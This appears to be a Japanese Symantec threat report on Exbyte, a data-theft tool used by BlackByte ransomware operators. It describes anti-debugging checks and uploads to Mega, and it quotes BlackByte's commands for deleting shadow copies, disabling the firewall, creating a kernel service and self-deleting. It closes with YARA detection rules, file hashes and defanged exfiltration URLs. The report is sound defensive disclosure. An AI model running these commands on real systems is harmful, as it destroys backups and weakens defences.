Exbyte: BlackByteランサムウェアの攻撃グループが新たなデータ窃取ツールを展開

シマンテックの脅威調査チームは、BlackByteランサムウェア（Ransom.Blackbyte）攻撃の1つ以上のアフィリエイトが、データ窃取のカスタムツールを攻撃時に使用し始めたことを発見しました。このマルウェア（Infostealer.Exbyte）は、標的のネットワークからのデータ窃取を迅速化し、外部サーバーにアップロードするよう設計されています。

BlackByteはRaaS（サービスとしてのランサムウェア）オペレーションで、シマンテックがHecamedeと呼ぶサイバー犯罪グループによって運営されています。このグループが初めて世間の注目を集めたのは2022年2月のことです。当時、米国連邦捜査局（FBI）が発表した警告で、少なくとも3つの重要インフラ分野の組織を含む米国の複数の組織を標的とした攻撃で、BlackByteが使用されていたことが明らかになりました。ここ数か月間、BlackByteはランサムウェア攻撃で最も頻繁に使用されたペイロードの1つになっています。

Exbyteの動作

Exbyteデータ窃取ツールはGOで記述されており、盗んだファイルをMega.co.nzクラウドストレージサービスにアップロードするよう設計されています。

Exbyteは実行時、サンドボックス環境で実行している兆候がないか調べるために、一連のチェックを行います。これは、セキュリティ研究者によるマルウェアの分析を困難にすることを意図しています。そのために、IsDebuggerPresentおよびCheckRemoteDebuggerPresent APIを呼び出します。次に、以下のアプリケーションの実行中のプロセスを確認します。

• MegaDumper 1.0 by CodeCracker / SnD
• Import Reconstructor
• x64dbg
• x32dbg
• OllyDbg
• WinDbg
• Interactive Disassembler
• Immunity Debugger - [CPU]

次に、以下のウイルス対策ファイルまたはサンドボックス関連ファイルをチェックします。

• avghooka.dll
• avghookx.dll
• sxin.dll
• sf2.dll
• sbiedll.dll
• snxhk.dll
• cmdvrt32.dll
• cmdvrt64.dll
• wpespy.dll
• vmcheck.dll
• pstorec.dll
• dir_watch.dll
• api_log.dll
• dbghelp.dll

この一連のチェックは、 BlackByteのペイロードが行う一連の作業と非常に似ていることが、Sophosから最近報告されています。.

次に、Exbyteは感染したコンピュータ上のすべての文書ファイル（.txt、.doc、.pdfなど）をリストし、フルパスとファイル名を%APPDATA%\dummyに保存します。リストされたファイルは次に、ExbyteがMega.co.nz上に作成したフォルダにアップロードされます。使用されるMegaアカウントのクレデンシャルは、Exbyteにハードコードされています。

Exbyteはランサムウェア攻撃に関連付けられた初めてのカスタム開発データ窃取ツールではありません。2021年11月、Symantecが発見したExmatterは、BlackMatterランサムウェア攻撃で使用されたデータ窃取ツールで、それ以来、Noberus攻撃で使用されています。他の例には、Ryuk Stealerツールや、LockBitランサムウェアと関連のあるStealBitランサムウェアがあります。

BlackByteのTTP

シマンテックが調査した最近のBlackByte攻撃では、攻撃者はMicrosoft Exchange Serverの脆弱性、ProxyShell（CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207）とProxyLogon（CVE-2021-26855 and CVE-2021-27065）を悪用し、 初期アクセスを行っています。

シマンテックは、攻撃者がAdFind、AnyDesk、NetScan、PowerViewを使用した後に、ランサムウェアペイロードを展開していることを確認しました。

最近の攻撃では、BlackByteペイロードのバージョン2.0が使用されていました。実行時、ランサムウェアペイロード自体が、Microsoftからデバッグシンボルをダウンロードし保存しているとみられています。コマンドはランサムウェアから直接実行されます。

powershell -command "(New-Object Net.WebClient).DownloadFile('http://msdl.microsoft.com/download/symbols/ntkrnlmp.pdb/11D60DB07BA7433B923F49867DF515721/ntkrnlmp.pdb', 'CSIDL_SYSTEM_DRIVE\systemdata\ntkrnlmp.pdb')"

次にランサムウェアは、ntoskrnl.exeのバージョン情報をチェックし、以下の詳細を含むサービスを作成します。

binPath = C:\systemdata\generalate

displayName = AAAAAAAAAAAAAA!!!!!!!!!!!!!!!

BlackByteは次に、カーネル通知ルーチンの削除を始めます。これは、EDR製品を回避することを目的としています。BlackByteのこの機能はSophosがすでに報告済みで、EDRSandblastツールで使用された手法と酷似しています。

BlackByteはVssAdminを使用してシャドーコピーを大量削除し、ストレージの割り当ての規模を変更します。

cmd.exe /c start vssadmin.exe Delete Shadows /All /Quiet

vssadmin Resize ShadowStorage /For=K: /On=K: /MaxSize=401MB

次に、以下のようにサービスの変更を行います。

sc create ODosTEmONa binPath= CSIDL_SYSTEM_DRIVE\systemdata\generalate type= kernel

sc.exe config RemoteRegistry start= auto

sc.exe config Dnscache start= auto

sc.exe config SSDPSRV start= auto

sc.exe config fdPHost start= auto

sc.exe config upnphost start= auto

次に、ファイアウォールの設定を変更し、リンクした接続を有効にします。

netsh advfirewall firewall set rule "group=\"Network Discovery\" " new enable=Yes"

netsh advfirewall firewall set rule "group=\"File and Printer Sharing\" " new enable=Yes"

cmd.exe /c netsh advfirewall set allprofiles state off

最後に、BlackByteは自身をsvchost.exeのインスタンスに挿入し、ファイル暗号化を行ってから、ディスク上のランサムウェアのバイナリを削除します。

cmd.exe /c ping 1.1.1.1 -n 10 > Nul & Del CSIDL_WINDOWS\rdac.exe /F /Q

CSIDL_SYSTEM\svchost.exe -s 27262842

新興勢力

ContiやSodinokibiなど複数の主要なランサムウェア攻撃の登場に続き、BlackByteは市場のこのギャップから利益を上げるランサムウェアアクターの1つとして登場しました。現在、BlackByte攻撃で使用するためのカスタムツールをアクターが作成しているという事実は、BlackByteが有力なランサムウェア脅威の1つになりつつある可能性を示唆しています。

保護/緩和

Symantec Protection Bulletinで保護に関する最新情報をご確認ください。

Yaraルール

rule blackbyte_exfil

{

     meta:

      copyright = "Symantec"

      family = "Alias: ExfilTool"

      description = "Detects exfil tool used by BlackByte ransomware"

     strings:

      $data_str1 = {41 B9 04 00 00 00 66 66 0F 1F 84 00 00 00 00 00

                    43 0F B6 84 02 A0 00 00 00 41 30 00 49 FF C0 49

                    83 E9 01 75 EB 49 83 EB 01 75 D5 40 B7 09 48 8D}

      $data_str2 = {32 10 05 AF 59 2E 0D 38 32 59 C0 99 E8 A5 87 CB}

      $data_str3 = "@BCEFHJLNPRTVY" ascii

     condition:

       all of ($data_str*)

        and filesize > 2MB and filesize < 3MB and

        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)

}

rule blackbyte_exfil_unpacked

{

     meta:

      copyright = "Symantec"

      family = "Alias:ExfilTool"

      description = "Detects unpacked exfil tool used by BlackByte ransomware"

     strings:

      $str1 = ").Login"

      $str2 = ").NewUpload"

      $str3 = ").CreateDir"

      $str4 = ".PreloginMsg"

      $str5 = ".UploadCompleteMsg"

      $str6 = ").UploadFile"

                  $str7 = {FF 20 47 6F 20 62 75 69 6C 64 69 6E 66 3A 08 02

                           00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                   07 75 6E 6B 6E 6F 77 6E 00 00 00 00 00 00 00 00}

                  $c1 = {44 24 68 44 31 C2 88 50 10 0F B6 54 24 56 44 0F}

                  $c2 = {FB 48 89 F7 4C 89 C6 E8 54 ED F6 FF 4C 8D 43 01}

     condition:

       all of ($str*) and ($c1 or $c2)

        and filesize > 8MB  and

        (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550)

}

侵害の痕跡

IOCが悪意のあるもので、シマンテックが入手できるファイルであれば、Symantec Endpoint製品はそのファイルを検知し、ブロックします。

SHA256ファイルハッシュ:

3fb160e1770fafeedff2d77841bf02108c25cca4cb6d77e3fbf759077f356b70 - Infostealer.Exbyte

0097b8722c8c0840e8c1a4dd579438344b3e6b4d630d17b0bbe9c55159f43142 - Infostealer.Exbyte

aeb1b789395357e8cc8dbd313b95f624fc03e037984040cd7c1704775bfb4bd2 - Infostealer.Exbyte

477382529659c3452020170d8150820210ab8cbdc6417a0f0ac86a793cd0d9b4 - Ransom.Blackbyte

1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad - Ransom.Blackbyte

44a5e78fce5455579123af23665262b10165ac710a9f7538b764af76d7771550 - Ransom.Blackbyte

eb24370166021f9243fd98c0be7b22ab8cbc22147c15ecef8e75746eb484bb1a - Ransom.Blackbyte

f361bafcc00b1423d24a7ea205264f5a0b96011e4928d9a91c2abc9911b433a1 - Ransom.Blackbyte

20848d28414d4811b63b9645adb549eed0afbd6415d08b75b0a93fbf7cfbf21f - Ransom.Blackbyte

754ac79aca0cc1bcf46000ef6c4cbe8bebeb50dae60823a1e844647ac16b6867 - Ransom.Blackbyte

f157090fd3ccd4220298c06ce8734361b724d80459592b10ac632acc624f455e - AdFind

794a5621fda2106fcb94cbd91b6ab9567fb8383caa7f62febafcf701175f2b91 - AdFind batch script

572d88c419c6ae75aeb784ceab327d040cb589903d6285bbffa77338111af14b - NetScan

efc2125e628b116eb0c097c699e473a47a280dfcd3e02cada41bdf6969600b41 - PowerView

4877ff7c3c2abd349646db1163814811e69b36374e289f5808cc794113ef55ae - AnyDesk

ネットワーク:

hxxp://gfs270n392[.]userstorage.mega.co[.]nz/ul/PCfY6R3GKGjIEQK2tzWLODSlhG-h5NbxGHdNAToANCzjKK8Z6kdCiqshxM6ctHDKpLU09-YobgYybaQkCnpwnw/4718592

hxxp://gfs262n303[.]userstorage.mega.co[.]nz/ul/f_re9dP6f9G8GAJhd3p43aJnvHnw7rCHLumJV-MXDlaL2RaSQQrPH1BYStJHWy4JkPgJ13KczuiJoOl0iwjxDA/15204352

hxxp://gfs206n171[.]userstorage.mega.co[.]nz/ul/9Y39ts0Mp6xtige0-wHhmMG74YgASgG1UhZYfzl_fh8TN_TQo1gSa92TNe_HTBxvOTirA0yfouEE74-Y3Cy1Tw/81264640

hxxp://gfs206n108[.]userstorage.mega.co[.]nz/ul/aX72PSSxERHKJwLdWCCOmsJQRioP7N6kcAltRRTbAgwGtNzcsdYa_7HTb4ToVV_HcVPORXotYAF5WqFAsmAOKA/15204352

hxxp://gfs208n174.userstorage[.]mega.co.nz/ul/z6nR8uTohiga4QeILJsXcAWlt05Vhu2XiDlne_Qag-rgAmZkK2aZMvYrWC5FHRebBpMoxYZEEqSStHyvU6SnWQ/6815744

hxxp://gfs214n129.userstorage[.]mega.co.nz/ul/wVJUlrn9bMLekALaMZx_o5FeK-U1oG9q4CWqHGNslUnVY2-BgJcEUxIJX9O4fXEWkt-x80LeAr7Jz9gXTCwzDA/2752512

hxxp://gfs204n140.userstorage[.]mega.co.nz/ul/_Amu75VCTCu6BgIdFs8ZgHPyHqBFm5Cj8bV1xkM5QFt2T0x-9C_KlHQAQ3kX4bzj8jgmyK9-dlbmx9ef6Y9JDw/1966080